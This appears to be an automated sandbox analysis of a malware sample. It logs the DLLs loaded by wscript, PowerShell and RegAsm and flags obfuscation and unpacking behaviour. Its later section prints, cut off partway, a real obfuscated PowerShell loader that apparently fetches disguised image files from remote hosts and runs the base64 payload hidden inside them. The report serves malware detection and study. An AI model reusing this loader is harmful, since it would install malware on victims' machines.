                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@", "0")
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, w0gUvjn1pmlF6l1K21B.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, w0gUvjn1pmlF6l1K21B.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: 7.2.RegAsm.exe.40357d0.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 7.2.RegAsm.exe.40357d0.3.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 7.2.RegAsm.exe.40357d0.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 7.2.RegAsm.exe.40357d0.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 7.2.RegAsm.exe.40357d0.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 7.2.RegAsm.exe.3fe57b0.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 7.2.RegAsm.exe.3fe57b0.4.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 7.2.RegAsm.exe.3fe57b0.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 7.2.RegAsm.exe.3fe57b0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 7.2.RegAsm.exe.3fe57b0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 7.2.RegAsm.exe.57e0000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 7.2.RegAsm.exe.57e0000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 7.2.RegAsm.exe.57e0000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 7.2.RegAsm.exe.57e0000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 7.2.RegAsm.exe.57e0000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
